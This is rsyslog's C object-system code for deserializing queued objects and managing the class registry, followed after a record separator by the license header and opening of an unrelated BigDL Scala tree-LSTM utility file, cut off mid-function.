	assert(iLen >= 0);
	CHKiRet(cstrConstruct(&pCStr));
	NEXTC;
	for(i = 0 ; i < iLen ; ++i) {
		CHKiRet(cstrAppendChar(pCStr, c));
		NEXTC;
	}
	cstrFinalize(pCStr);
	/* check terminator */
	if(c != ':') ABORT_FINALIZE(RS_RET_INVALID_DELIMITER);
	*ppCStr = pCStr;
finalize_it:
	if(iRet != RS_RET_OK && pCStr != NULL)
		cstrDestruct(&pCStr);
	RETiRet;
}
/* de-serialize a syslogTime -- rgerhards,2008-01-08 */
/* helper macro: de-serialize the next number from the stream and assign
 * it to the given field of pTime. Relies on the local variable 'l' and
 * the parameter 'pStrm' of the enclosing function.
 */
#define GETVAL(var) \
CHKiRet(objDeserializeNumber(&l, pStrm)); \
pTime->var = l;
/* Read all fields of a serialized syslogTime_t, in the fixed order in
 * which the serializer wrote them.
 */
static rsRetVal objDeserializeSyslogTime(syslogTime_t *pTime, strm_t *pStrm)
{
DEFiRet;
number_t l;
uchar c;
assert(pTime != NULL);
GETVAL(timeType);
GETVAL(year);
GETVAL(month);
GETVAL(day);
GETVAL(hour);
GETVAL(minute);
GETVAL(second);
GETVAL(secfrac);
GETVAL(secfracPrecision);
/* OffsetMode is a single character (not a number), so it is read
 * directly, followed by its own ':' delimiter check. */
NEXTC; pTime->OffsetMode = c;
NEXTC; if(c != ':') ABORT_FINALIZE(RS_RET_INVALID_DELIMITER);
GETVAL(OffsetHour);
GETVAL(OffsetMinute);
finalize_it:
RETiRet;
}
#undef GETVAL
/* de-serialize an object header
 * rgerhards, 2008-01-07
 */
/* Reads and validates the header line of a serialized object/property bag:
 * cookie, record type (pszRecType, must be "Obj" or "OPB"), fixed header
 * format version '1', then the object type name into *ppstrID and the
 * object version into *poVers. Anything left on the line is skipped up to
 * and including the terminating '\n'.
 */
static rsRetVal objDeserializeHeader(uchar *pszRecType, cstr_t **ppstrID, int* poVers, strm_t *pStrm)
{
DEFiRet;
number_t oVers;
uchar c;
assert(ppstrID != NULL);
assert(poVers != NULL);
assert(!strcmp((char*) pszRecType, "Obj") || !strcmp((char*) pszRecType, "OPB"));
/* check header cookie */
NEXTC; if(c != COOKIE_OBJLINE) ABORT_FINALIZE(RS_RET_INVALID_HEADER);
NEXTC; if(c != pszRecType[0]) ABORT_FINALIZE(RS_RET_INVALID_HEADER_RECTYPE);
NEXTC; if(c != pszRecType[1]) ABORT_FINALIZE(RS_RET_INVALID_HEADER_RECTYPE);
NEXTC; if(c != pszRecType[2]) ABORT_FINALIZE(RS_RET_INVALID_HEADER_RECTYPE);
NEXTC; if(c != ':') ABORT_FINALIZE(RS_RET_INVALID_HEADER);
NEXTC; if(c != '1') ABORT_FINALIZE(RS_RET_INVALID_HEADER_VERS);
NEXTC; if(c != ':') ABORT_FINALIZE(RS_RET_INVALID_HEADER_VERS);
/* object type and version */
CHKiRet(objDeserializeEmbedStr(ppstrID, pStrm));
CHKiRet(objDeserializeNumber(&oVers, pStrm));
/* and now we skip over the rest until the delimiting \n */
NEXTC;
while(c != '\n') {
NEXTC;
}
*poVers = oVers;
finalize_it:
RETiRet;
}
/* Deserialize a single property. Pointer must be positioned at begin of line. Whole line
 * up until the \n is read.
 * Line format: <COOKIE_PROPLINE><name>:<type>:<len>:<value>:\n
 * Returns RS_RET_NO_PROPLINE (with the read character pushed back) when the
 * line does not start with the property cookie - this is the normal loop
 * terminator for callers iterating over properties.
 */
rsRetVal objDeserializeProperty(var_t *pProp, strm_t *pStrm)
{
DEFiRet;
number_t i;
number_t iLen;
uchar c;
int step = 0; /* which step was successful? (used for error diagnostics below) */
int64 offs;
assert(pProp != NULL);
/* check cookie */
NEXTC;
if(c != COOKIE_PROPLINE) {
/* oops, we've read one char that does not belong to us - unget it first */
CHKiRet(strm.UnreadChar(pStrm, c));
ABORT_FINALIZE(RS_RET_NO_PROPLINE);
}
/* get the property name first */
CHKiRet(cstrConstruct(&pProp->pcsName));
NEXTC;
while(c != ':') {
CHKiRet(cstrAppendChar(pProp->pcsName, c));
NEXTC;
}
cstrFinalize(pProp->pcsName);
step = 1;
/* property type */
CHKiRet(objDeserializeNumber(&i, pStrm));
pProp->varType = i;
step = 2;
/* size (needed for strings) */
CHKiRet(objDeserializeNumber(&iLen, pStrm));
step = 3;
/* we now need to deserialize the value */
switch(pProp->varType) {
case VARTYPE_STR:
CHKiRet(objDeserializeStr(&pProp->val.pStr, iLen, pStrm));
break;
case VARTYPE_NUMBER:
CHKiRet(objDeserializeNumber(&pProp->val.num, pStrm));
break;
case VARTYPE_SYSLOGTIME:
CHKiRet(objDeserializeSyslogTime(&pProp->val.vSyslogTime, pStrm));
break;
case VARTYPE_NONE:
default:
dbgprintf("invalid VARTYPE %d\n", pProp->varType);
break;
}
step = 4;
/* we should now be at the end of the line. So the next char must be \n */
NEXTC;
if(c != '\n') ABORT_FINALIZE(RS_RET_INVALID_PROPFRAME);
finalize_it:
/* ensure the type of var is reset back to VARTYPE_NONE since
 * the deconstruct method of var might free unallocated memory
 */
if(iRet != RS_RET_OK && iRet != RS_RET_NO_PROPLINE) {
if(step <= 2) {
pProp->varType = VARTYPE_NONE;
}
}
/* on real errors, dump what was parsed so far for troubleshooting */
if(Debug && iRet != RS_RET_OK && iRet != RS_RET_NO_PROPLINE) {
strm.GetCurrOffset(pStrm, &offs);
dbgprintf("error %d deserializing property name, offset %lld, step %d\n",
iRet, offs, step);
strmDebugOutBuf(pStrm);
if(step >= 1) {
dbgprintf("error property name: '%s'\n", rsCStrGetSzStrNoNULL(pProp->pcsName));
}
if(step >= 2) {
dbgprintf("error var type: '%d'\n", pProp->varType);
}
if(step >= 3) {
dbgprintf("error len: '%d'\n", (int) iLen);
}
if(step >= 4) {
switch(pProp->varType) {
case VARTYPE_STR:
dbgprintf("error data string: '%s'\n",
rsCStrGetSzStrNoNULL(pProp->val.pStr));
break;
case VARTYPE_NUMBER:
dbgprintf("error number: %d\n", (int) pProp->val.num);
break;
case VARTYPE_SYSLOGTIME:
dbgprintf("syslog time was successfully parsed (but "
"is not displayed\n");
break;
case VARTYPE_NONE:
default:
break;
}
}
}
RETiRet;
}
/* de-serialize an object trailer. This does not get any data but checks if the
 * format is ok, i.e. that the stream contains exactly the byte sequence
 * which EndSerialize() has written.
 * rgerhards, 2008-01-07
 */
static rsRetVal objDeserializeTrailer(strm_t *pStrm)
{
	static const uchar trailer[] = {
		COOKIE_ENDLINE, 'E', 'n', 'd', '\n', COOKIE_BLANKLINE, '\n' };
	size_t i;
	uchar c;
	DEFiRet;

	for(i = 0 ; i < sizeof(trailer) ; ++i) {
		NEXTC;
		if(c != trailer[i]) ABORT_FINALIZE(RS_RET_INVALID_TRAILER);
	}

finalize_it:
	if(Debug && iRet != RS_RET_OK) {
		dbgprintf("objDeserializeTrailer fails with %d\n", iRet);
	}
	RETiRet;
}
/* This method tries to recover a serial store if it got out of sync.
* To do so, it scans the line beginning cookies and waits for the object
* cookie. If that is found, control is returned. If the store is exhausted,
* we will receive an RS_RET_EOF error as part of NEXTC, which will also
 * terminate this function. So we may either return with something that
* looks like a valid object or end of store.
* rgerhards, 2008-01-07
*/
static rsRetVal objDeserializeTryRecover(strm_t *pStrm)
{
	int bWasNL = 0; /* was the previously-read char a newline? */
	uchar c;
	DEFiRet;

	assert(pStrm != NULL);

	/* scan char-by-char until an object cookie appears right at the
	 * beginning of a line (i.e. immediately after a newline). An EOF
	 * inside NEXTC terminates the scan with the corresponding error.
	 */
	for(;;) {
		NEXTC;
		if(bWasNL && c == COOKIE_OBJLINE)
			break; /* found the start of the next object */
		bWasNL = (c == '\n');
	}

	/* push the cookie back so the header parser sees a full header */
	CHKiRet(strm.UnreadChar(pStrm, c));

finalize_it:
	dbgprintf("deserializer has possibly been able to re-sync and recover, state %d\n", iRet);
	RETiRet;
}
/* De-serialize the properties of an object. This includes processing
 * of the trailer. Header must already have been processed.
 * Each successfully-read property is handed to the caller-supplied
 * objSetProperty() callback; a single var_t instance is re-used for all
 * properties of the object.
 * rgerhards, 2008-01-11
 */
static rsRetVal objDeserializeProperties(obj_t *pObj, rsRetVal (*objSetProperty)(), strm_t *pStrm)
{
DEFiRet;
var_t *pVar = NULL;
ISOBJ_assert(pObj);
ISOBJ_TYPE_assert(pStrm, strm);
CHKiRet(var.Construct(&pVar));
CHKiRet(var.ConstructFinalize(pVar));
/* read property lines until the first non-property line is reached */
iRet = objDeserializeProperty(pVar, pStrm);
while(iRet == RS_RET_OK) {
CHKiRet(objSetProperty(pObj, pVar));
/* re-init var object - TODO: method of var! */
rsCStrDestruct(&pVar->pcsName); /* no longer needed */
if(pVar->varType == VARTYPE_STR) {
if(pVar->val.pStr != NULL)
rsCStrDestruct(&pVar->val.pStr);
}
iRet = objDeserializeProperty(pVar, pStrm);
}
/* RS_RET_NO_PROPLINE is the expected loop terminator; everything else
 * is a real error that must be propagated */
if(iRet != RS_RET_NO_PROPLINE)
FINALIZE;
CHKiRet(objDeserializeTrailer(pStrm)); /* do trailer checks */
finalize_it:
if(pVar != NULL)
var.Destruct(&pVar);
RETiRet;
}
/* De-Serialize an object.
 * Params: Pointer to object Pointer (pObj) (like a obj_t**, but can not do that due to compiler warning)
 * expected object ID (to check against), a fixup function that can modify the object before it is finalized
 * and a user pointer that is to be passed to that function in addition to the object. The fixup function
 * pointer may be NULL, in which case none is called.
 * The object class is looked up in the registry and its CONSTRUCT /
 * SETPROPERTY / CONSTRUCTION_FINALIZER methods are used to instantiate it.
 * The caller must destruct the created object.
 * rgerhards, 2008-01-07
 */
static rsRetVal
Deserialize(void *ppObj, uchar *pszTypeExpected, strm_t *pStrm, rsRetVal (*fFixup)(obj_t*,void*), void *pUsr)
{
DEFiRet;
rsRetVal iRetLocal;
obj_t *pObj = NULL;
int oVers = 0; /* keep compiler happy, but it is totally useless but takes up some execution time... */
cstr_t *pstrID = NULL;
objInfo_t *pObjInfo;
assert(ppObj != NULL);
assert(pszTypeExpected != NULL);
ISOBJ_TYPE_assert(pStrm, strm);
/* we de-serialize the header. if all goes well, we are happy. However, if
 * we experience a problem, we try to recover. We do this by skipping to
 * the next object header. This is defined via the line-start cookies. In
 * worst case, we exhaust the queue, but then we receive EOF return state,
 * from objDeserializeTryRecover(), what will cause us to ultimately give up.
 * rgerhards, 2008-07-08
 */
do {
iRetLocal = objDeserializeHeader((uchar*) "Obj", &pstrID, &oVers, pStrm);
if(iRetLocal != RS_RET_OK) {
dbgprintf("objDeserialize error %d during header processing - trying to recover\n", iRetLocal);
CHKiRet(objDeserializeTryRecover(pStrm));
}
} while(iRetLocal != RS_RET_OK);
/* the type found in the stream must match what the caller expects */
if(rsCStrSzStrCmp(pstrID, pszTypeExpected, ustrlen(pszTypeExpected)))
/* TODO: optimize strlen() - caller shall provide */
ABORT_FINALIZE(RS_RET_INVALID_OID);
CHKiRet(FindObjInfo((char*)cstrGetSzStrNoNULL(pstrID), &pObjInfo));
CHKiRet(pObjInfo->objMethods[objMethod_CONSTRUCT](&pObj));
/* we got the object, now we need to fill the properties */
CHKiRet(objDeserializeProperties(pObj, pObjInfo->objMethods[objMethod_SETPROPERTY], pStrm));
/* check if we need to call a fixup function that modifies the object
 * before it is finalized. -- rgerhards, 2008-01-13
 */
if(fFixup != NULL)
CHKiRet(fFixup(pObj, pUsr));
/* we have a valid object, let's finalize our work and return */
if(objInfoIsImplemented(pObjInfo, objMethod_CONSTRUCTION_FINALIZER))
CHKiRet(pObjInfo->objMethods[objMethod_CONSTRUCTION_FINALIZER](pObj));
*((obj_t**) ppObj) = pObj;
finalize_it:
if(iRet != RS_RET_OK && pObj != NULL)
free(pObj); /* TODO: check if we can call destructor 2008-01-13 rger */
if(pstrID != NULL)
rsCStrDestruct(&pstrID);
RETiRet;
}
/* De-Serialize an object, with known constructor and destructor. Params like Deserialize(),
 * except that construction, finalization and property de-serialization are done
 * via caller-supplied function pointers instead of the object registry.
 * Note: this is for the queue subsystem, and optimized for its use.
 * rgerhards, 2012-11-03
 */
rsRetVal
objDeserializeWithMethods(void *ppObj, uchar *pszTypeExpected, int lenTypeExpected, strm_t *pStrm,
rsRetVal (*fFixup)(obj_t*,void*), void *pUsr, rsRetVal (*objConstruct)(), rsRetVal (*objConstructFinalize)(),
rsRetVal (*objDeserialize)())
{
DEFiRet;
rsRetVal iRetLocal;
obj_t *pObj = NULL;
int oVers = 0; /* keep compiler happy, but it is totally useless but takes up some execution time... */
cstr_t *pstrID = NULL;
assert(ppObj != NULL);
assert(pszTypeExpected != NULL);
ISOBJ_TYPE_assert(pStrm, strm);
/* we de-serialize the header. if all goes well, we are happy. However, if
 * we experience a problem, we try to recover. We do this by skipping to
 * the next object header. This is defined via the line-start cookies. In
 * worst case, we exhaust the queue, but then we receive EOF return state,
 * from objDeserializeTryRecover(), what will cause us to ultimately give up.
 * rgerhards, 2008-07-08
 */
do {
iRetLocal = objDeserializeHeader((uchar*) "Obj", &pstrID, &oVers, pStrm);
if(iRetLocal != RS_RET_OK) {
dbgprintf("objDeserialize error %d during header processing - "
"trying to recover\n", iRetLocal);
CHKiRet(objDeserializeTryRecover(pStrm));
}
} while(iRetLocal != RS_RET_OK);
/* the type found in the stream must match what the caller expects */
if(rsCStrSzStrCmp(pstrID, pszTypeExpected, lenTypeExpected))
ABORT_FINALIZE(RS_RET_INVALID_OID);
CHKiRet(objConstruct(&pObj));
/* we got the object, now we need to fill the properties */
CHKiRet(objDeserialize(pObj, pStrm));
CHKiRet(objDeserializeTrailer(pStrm)); /* do trailer checks */
/* check if we need to call a fixup function that modifies the object
 * before it is finalized. -- rgerhards, 2008-01-13
 */
if(fFixup != NULL)
CHKiRet(fFixup(pObj, pUsr));
/* we have a valid object, let's finalize our work and return */
if(objConstructFinalize != NULL) {
CHKiRet(objConstructFinalize(pObj));
}
*((obj_t**) ppObj) = pObj;
finalize_it:
if(iRet != RS_RET_OK && pObj != NULL)
free(pObj); /* TODO: check if we can call destructor 2008-01-13 rger */
if(pstrID != NULL)
rsCStrDestruct(&pstrID);
if(Debug && iRet != RS_RET_OK) {
dbgprintf("objDeserializeWithMethods fails with %d, stream state:\n", iRet);
strmDebugOutBuf(pStrm);
}
RETiRet;
}
/* This is a dummy deserializer, to be used for the delete queue reader
 * specifically. This is kind of a hack, but also to be replaced (hopefully) soon
 * by totally different code. So let's make it as simple as possible...
 * It reads and discards all properties of one object; the object itself
 * is never touched (hence the unused pObj parameter).
 * rgerhards, 2012-11-06
 */
rsRetVal
objDeserializeDummy(obj_t __attribute__((unused)) *pObj, strm_t *pStrm)
{
DEFiRet;
var_t *pVar = NULL;
CHKiRet(var.Construct(&pVar));
CHKiRet(var.ConstructFinalize(pVar));
iRet = objDeserializeProperty(pVar, pStrm);
while(iRet == RS_RET_OK) {
/* this loop does actually NOTHING but read (and discard) the properties */
/* re-init var object - TODO: method of var! */
rsCStrDestruct(&pVar->pcsName); /* no longer needed */
if(pVar->varType == VARTYPE_STR) {
if(pVar->val.pStr != NULL)
rsCStrDestruct(&pVar->val.pStr);
}
iRet = objDeserializeProperty(pVar, pStrm);
}
finalize_it:
if(iRet == RS_RET_NO_PROPLINE)
iRet = RS_RET_OK; /* NO_PROPLINE is OK and a kind of EOF! */
if(pVar != NULL)
var.Destruct(&pVar);
RETiRet;
}
/* De-Serialize an object property bag. As a property bag contains only partial properties,
 * it is not instantiable. Thus, the caller must provide a pointer to an already-instantiated
* object of the correct type.
* Params: Pointer to object (pObj)
* Pointer to be passed to the function
* The caller must destruct the created object.
* rgerhards, 2008-01-07
*/
static rsRetVal
DeserializePropBag(obj_t *pObj, strm_t *pStrm)
{
DEFiRet;
rsRetVal iRetLocal;
cstr_t *pstrID = NULL;
int oVers;
objInfo_t *pObjInfo;
ISOBJ_assert(pObj);
ISOBJ_TYPE_assert(pStrm, strm);
/* we de-serialize the header. if all goes well, we are happy. However, if
 * we experience a problem, we try to recover. We do this by skipping to
 * the next object header. This is defined via the line-start cookies. In
 * worst case, we exhaust the queue, but then we receive EOF return state
 * from objDeserializeTryRecover(), what will cause us to ultimately give up.
 * rgerhards, 2008-07-08
 */
do {
iRetLocal = objDeserializeHeader((uchar*) "OPB", &pstrID, &oVers, pStrm);
if(iRetLocal != RS_RET_OK) {
dbgprintf("objDeserializePropBag error %d during header - trying to recover\n", iRetLocal);
CHKiRet(objDeserializeTryRecover(pStrm));
}
} while(iRetLocal != RS_RET_OK);
/* the property bag's type must match the type of the target object */
if(rsCStrSzStrCmp(pstrID, pObj->pObjInfo->pszID, pObj->pObjInfo->lenID))
ABORT_FINALIZE(RS_RET_INVALID_OID);
CHKiRet(FindObjInfo((char*)cstrGetSzStrNoNULL(pstrID), &pObjInfo));
/* we got the object, now we need to fill the properties */
CHKiRet(objDeserializeProperties(pObj, pObjInfo->objMethods[objMethod_SETPROPERTY], pStrm));
finalize_it:
if(pstrID != NULL)
rsCStrDestruct(&pstrID);
RETiRet;
}
#undef NEXTC /* undef helper macro */
/* --------------- end object serializiation / deserialization support --------------- */
/* set the object (instance) name, replacing any previous name.
 * rgerhards, 2008-01-29
 * TODO: change the naming to a rsCStr obj! (faster)
 */
static rsRetVal
SetName(obj_t *pThis, uchar *pszName)
{
	uchar *pszNameNew;
	DEFiRet;

	/* duplicate the new name BEFORE freeing the old one: if the
	 * allocation fails, the object keeps its previous name instead of
	 * ending up nameless (the old code free()d first, leaving pszName
	 * NULL on OOM).
	 */
	CHKmalloc(pszNameNew = ustrdup(pszName));
	free(pThis->pszName);
	pThis->pszName = pszNameNew;

finalize_it:
	RETiRet;
}
/* get the object (instance) name
* Note that we use a non-standard calling convention. Thus function must never
 * fail, else we run into real big problems. So it must make sure that at least something
* is returned.
* rgerhards, 2008-01-30
*/
uchar * ATTR_NONNULL()
objGetName(obj_t *const pThis)
{
uchar *ret;
uchar szName[128];
BEGINfunc
ISOBJ_assert(pThis);
if(pThis->pszName == NULL) {
/* lazily generate a default name from class name plus address
 * and store it on the object */
snprintf((char*)szName, sizeof(szName), "%s %p", objGetClassName(pThis), pThis);
SetName(pThis, szName);
/* looks strange, but we NEED to re-check because if there was an
 * error in objSetName(), the pointer may still be NULL
 */
if(pThis->pszName == NULL) {
/* fall back to the class name - this function must never fail */
ret = objGetClassName(pThis);
} else {
ret = pThis->pszName;
}
} else {
ret = pThis->pszName;
}
ENDfunc
return ret;
}
/* Find the objInfo object for the current object
* rgerhards, 2008-02-29
*/
static rsRetVal
FindObjInfo(const char *const __restrict__ strOID, objInfo_t **ppInfo)
{
	int i;
	DEFiRet;

	/* linear scan of the (small) object registry for a matching ID */
	for(i = 0 ; i < OBJ_NUM_IDS ; ++i) {
		if(arrObjInfo[i] != NULL && !strcmp(strOID, (const char*)arrObjInfo[i]->pszID))
			break;
	}

	if(i == OBJ_NUM_IDS)
		ABORT_FINALIZE(RS_RET_NOT_FOUND);

	*ppInfo = arrObjInfo[i];

finalize_it:
	if(iRet == RS_RET_OK) {
		/* DEV DEBUG ONLY dbgprintf("caller requested object '%s', found at index %d\n", (*ppInfo)->pszID, i);*/
		/*EMPTY BY INTENSION*/;
	} else {
		dbgprintf("caller requested object '%s', not found (iRet %d)\n", strOID, iRet);
	}
	RETiRet;
}
/* register a classes' info pointer, so that we can reference it later, if needed to
* (e.g. for de-serialization support).
* rgerhards, 2008-01-07
* In this function, we look for a free space in the object table. While we do so, we
* also detect if the same object has already been registered, which is not valid.
* rgerhards, 2008-02-29
*/
static rsRetVal
RegisterObj(uchar *pszObjName, objInfo_t *pInfo)
{
	int bFound = 0;
	int i;
	DEFiRet;

	assert(pszObjName != NULL);
	assert(pInfo != NULL);

	/* scan the used slots (the table is filled front-to-back, so the
	 * first NULL entry marks the first free slot) while checking for a
	 * duplicate registration.
	 */
	for(i = 0 ; i < OBJ_NUM_IDS && arrObjInfo[i] != NULL ; ++i) {
		if(!ustrcmp(arrObjInfo[i]->pszID, pszObjName)) {
			bFound = 1;
			break;
		}
	}

	if(bFound) ABORT_FINALIZE(RS_RET_OBJ_ALREADY_REGISTERED);
	if(i >= OBJ_NUM_IDS) ABORT_FINALIZE(RS_RET_OBJ_REGISTRY_OUT_OF_SPACE);

	arrObjInfo[i] = pInfo;
	/* DEV debug only: dbgprintf("object '%s' successfully registered with
	   index %d, qIF %p\n", pszObjName, i, pInfo->QueryIF); */

finalize_it:
	if(iRet != RS_RET_OK) {
		LogError(0, NO_ERRCODE, "registering object '%s' failed with error code %d", pszObjName, iRet);
	}
	RETiRet;
}
/* deregister a classes' info pointer, usually called because the class is unloaded.
* After deregistration, the class can no longer be accessed, except if it is reloaded.
* rgerhards, 2008-03-10
*/
static rsRetVal
UnregisterObj(uchar *pszObjName)
{
	int i;
	DEFiRet;

	assert(pszObjName != NULL);

	/* find the registry slot for the given object name */
	for(i = 0 ; i < OBJ_NUM_IDS ; ++i) {
		if(arrObjInfo[i] != NULL && !ustrcmp(arrObjInfo[i]->pszID, pszObjName))
			break;
	}

	if(i == OBJ_NUM_IDS)
		ABORT_FINALIZE(RS_RET_OBJ_NOT_REGISTERED);

	InfoDestruct(&arrObjInfo[i]);
	/* DEV debug only: dbgprintf("object '%s' successfully unregistered with index %d\n", pszObjName, i); */

finalize_it:
	if(iRet != RS_RET_OK) {
		dbgprintf("unregistering object '%s' failed with error code %d\n", pszObjName, iRet);
	}
	RETiRet;
}
/* This function shall be called by anyone who would like to use an object. It will
* try to locate the object, load it into memory if not already present and return
* a pointer to the objects interface.
* rgerhards, 2008-02-29
*/
static rsRetVal
UseObj(const char *srcFile, uchar *pObjName, uchar *pObjFile, interface_t *pIf)
{
DEFiRet;
objInfo_t *pObjInfo;
/* DEV debug only: dbgprintf("source file %s requests object '%s',
ifIsLoaded %d\n", srcFile, pObjName, pIf->ifIsLoaded); */
pthread_mutex_lock(&mutObjGlobalOp);
/* ifIsLoaded states used below: 1 = loaded OK, 2 = load error */
if(pIf->ifIsLoaded == 1) {
ABORT_FINALIZE(RS_RET_OK); /* we are already set */
}
if(pIf->ifIsLoaded == 2) {
ABORT_FINALIZE(RS_RET_LOAD_ERROR); /* we had a load error and can not continue */
}
/* we must be careful that we do not enter in infinite loop if an error occurs during
 * loading a module. ModLoad emits an error message in such cases and that potentially
 * can trigger the same code here. So we initially set the module state to "load error"
 * and set it to "fully initialized" when the load succeeded. It's a bit hackish, but
 * looks like a good solution. -- rgerhards, 2008-03-07
 */
pIf->ifIsLoaded = 2;
iRet = FindObjInfo((const char*)pObjName, &pObjInfo);
if(iRet == RS_RET_NOT_FOUND) {
/* in this case, we need to see if we can dynamically load the object */
if(pObjFile == NULL) {
FINALIZE; /* no chance, we have lost... */
} else {
CHKiRet(module.Load(pObjFile, 0, NULL));
/* NOW, we must find it or we have a problem... */
CHKiRet(FindObjInfo((const char*)pObjName, &pObjInfo));
}
} else if(iRet != RS_RET_OK) {
FINALIZE; /* give up */
}
/* if we reach this point, we have a valid pObjInfo */
if(pObjFile != NULL) { /* NULL means core module */
module.Use(srcFile, pObjInfo->pModInfo); /* increase refcount */
}
CHKiRet(pObjInfo->QueryIF(pIf));
pIf->ifIsLoaded = 1; /* we are happy */
finalize_it:
pthread_mutex_unlock(&mutObjGlobalOp);
RETiRet;
}
/* This function shall be called when a caller is done with an object. Its primary
* purpose is to keep the reference count correct, which is highly important for
* modules residing in loadable modules.
* rgerhards, 2008-03-10
*/
static rsRetVal
ReleaseObj(const char *srcFile, uchar *pObjName, uchar *pObjFile, interface_t *pIf)
{
DEFiRet;
objInfo_t *pObjInfo;
/* dev debug only dbgprintf("source file %s releasing object '%s',
ifIsLoaded %d\n", srcFile, pObjName, pIf->ifIsLoaded); */
pthread_mutex_lock(&mutObjGlobalOp);
if(pObjFile == NULL)
FINALIZE; /* if it is not a loadable module, we do not need to do anything... */
/* ifIsLoaded states: 0 = not loaded, 1 = loaded OK, 2 = load error */
if(pIf->ifIsLoaded == 0) {
FINALIZE; /* we are not loaded - this is perfectly OK... */
} else if(pIf->ifIsLoaded == 2) {
pIf->ifIsLoaded = 0; /* clean up */
FINALIZE; /* we had a load error and can not/must not continue */
}
CHKiRet(FindObjInfo((const char*)pObjName, &pObjInfo));
/* if we reach this point, we have a valid pObjInfo */
module.Release(srcFile, &pObjInfo->pModInfo); /* decrease refcount */
pIf->ifIsLoaded = 0; /* indicated "no longer valid" */
finalize_it:
pthread_mutex_unlock(&mutObjGlobalOp);
RETiRet;
}
/* queryInterface function
* rgerhards, 2008-02-29
*/
PROTOTYPEObjQueryInterface(obj);
/* macro-generated query-interface function: fills the caller's interface
 * structure with pointers to this class' public methods after checking
 * the requested interface version.
 */
BEGINobjQueryInterface(obj)
CODESTARTobjQueryInterface(obj)
if(pIf->ifVersion != objCURR_IF_VERSION) { /* check for current version, increment on each change */
ABORT_FINALIZE(RS_RET_INTERFACE_NOT_SUPPORTED);
}
/* ok, we have the right interface, so let's fill it
 * Please note that we may also do some backwards-compatibility
 * work here (if we can support an older interface version - that,
 * of course, also affects the "if" above).
 */
pIf->UseObj = UseObj;
pIf->ReleaseObj = ReleaseObj;
pIf->InfoConstruct = InfoConstruct;
pIf->DestructObjSelf = DestructObjSelf;
pIf->BeginSerializePropBag = BeginSerializePropBag;
pIf->InfoSetMethod = InfoSetMethod;
pIf->BeginSerialize = BeginSerialize;
pIf->SerializeProp = SerializeProp;
pIf->EndSerialize = EndSerialize;
pIf->RegisterObj = RegisterObj;
pIf->UnregisterObj = UnregisterObj;
pIf->Deserialize = Deserialize;
pIf->DeserializePropBag = DeserializePropBag;
pIf->SetName = SetName;
pIf->GetName = objGetName;
finalize_it:
ENDobjQueryInterface(obj)
/* This function returns a pointer to our own interface. It is used as the
* hook that every object (including dynamically loaded ones) can use to
* obtain a pointer to our interface which than can be used to obtain
* pointers to any other interface in the system. This function must be
* externally visible because of its special nature.
* rgerhards, 2008-02-29 [nice - will have that date the next time in 4 years ;)]
*/
rsRetVal
objGetObjInterface(obj_if_t *pIf)
{
DEFiRet;
assert(pIf != NULL);
/* delegate to the macro-generated query-interface function above */
objQueryInterface(pIf);
RETiRet;
}
/* exit our class
* rgerhards, 2008-03-11
*/
rsRetVal
objClassExit(void)
{
DEFiRet;
/* release objects we no longer need */
objRelease(strm, CORE_COMPONENT);
objRelease(var, CORE_COMPONENT);
objRelease(module, CORE_COMPONENT);
/* TODO: implement the class exits! */
#if 0
cfsyslineExit(pModInfo);
varClassExit(pModInfo);
#endif
/* tear down the helper classes that objClassInit() brought up */
errmsgClassExit();
moduleClassExit();
RETiRet;
}
/* initialize our own class
* Please note that this also initializes those classes that we rely on.
* Though this is a bit dirty, we need to do it - otherwise we can't get
 * around that bootstrap problem. We need to face the fact that the obj
* class is a little different from the rest of the system, as it provides
* the core class loader functionality.
* rgerhards, 2008-02-29
*/
rsRetVal
objClassInit(modInfo_t *pModInfo)
{
pthread_mutexattr_t mutAttr;
int i;
DEFiRet;
/* first, initialize the object system itself. This must be done
 * before any other object is created.
 */
for(i = 0 ; i < OBJ_NUM_IDS ; ++i) {
arrObjInfo[i] = NULL;
}
/* the mutex must be recursive, because objects may call into other
 * object identifiers recursively.
 */
pthread_mutexattr_init(&mutAttr);
pthread_mutexattr_settype(&mutAttr, PTHREAD_MUTEX_RECURSIVE);
pthread_mutex_init(&mutObjGlobalOp, &mutAttr);
/* request objects we use */
CHKiRet(objGetObjInterface(&obj)); /* get ourselves ;) */
/* init classes we use (limit to as few as possible!)
 * NOTE: the init order matters - these classes bootstrap each other */
CHKiRet(errmsgClassInit(pModInfo));
CHKiRet(datetimeClassInit(pModInfo));
CHKiRet(cfsyslineInit());
CHKiRet(varClassInit(pModInfo));
CHKiRet(moduleClassInit(pModInfo));
CHKiRet(strmClassInit(pModInfo));
CHKiRet(objUse(var, CORE_COMPONENT));
CHKiRet(objUse(module, CORE_COMPONENT));
CHKiRet(objUse(strm, CORE_COMPONENT));
finalize_it:
RETiRet;
}
/* vi:set ai:
*/
| {
"pile_set_name": "Github"
} |
/*
* Copyright 2016 The BigDL Authors.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package com.intel.analytics.bigdl.example.treeLSTMSentiment
import com.intel.analytics.bigdl.dataset.Sample
import com.intel.analytics.bigdl.example.utils.AbstractTextClassificationParams
import com.intel.analytics.bigdl.nn.TensorTree
import com.intel.analytics.bigdl.numeric.NumericFloat
import com.intel.analytics.bigdl.tensor.{Storage, Tensor}
import com.intel.analytics.bigdl.utils.RandomGenerator.RNG
import org.apache.spark.SparkContext
import org.apache.spark.broadcast.Broadcast
import org.apache.spark.rdd.RDD
import scopt.OptionParser
import scala.io.Source
import scala.language.existentials
import scala.reflect.ClassTag
import scala.util.control.Breaks._
object Utils {
/**
 * Build a tensor encoding of a dependency tree from a parent-pointer array.
 * parents(i) appears to hold the parent index of node i+1, with -1 marking
 * "no parent" (root) -- TODO confirm the exact index convention against the
 * tree data files. The result is the content tensor of a TensorTree with
 * one row per node and maxNumChildren + 1 columns.
 */
def readTree(
parents: Array[Int]
): Tensor[Float] = {
val size = parents.length
// widest fan-out over all parent values; determines the tree tensor width
val maxNumChildren = parents
.groupBy(x => x)
.foldLeft(0)((maxNum, p) => scala.math.max(maxNum, p._2.length))
val trees = new TensorTree(Tensor[Float](size, maxNumChildren + 1))
// walk from every not-yet-attached non-root node up towards the root,
// attaching each visited node to its parent along the way
for (i <- parents.indices) {
if (trees.noChild(i + 1) && parents(i) != -1) {
var idx = i + 1
var prev = 0
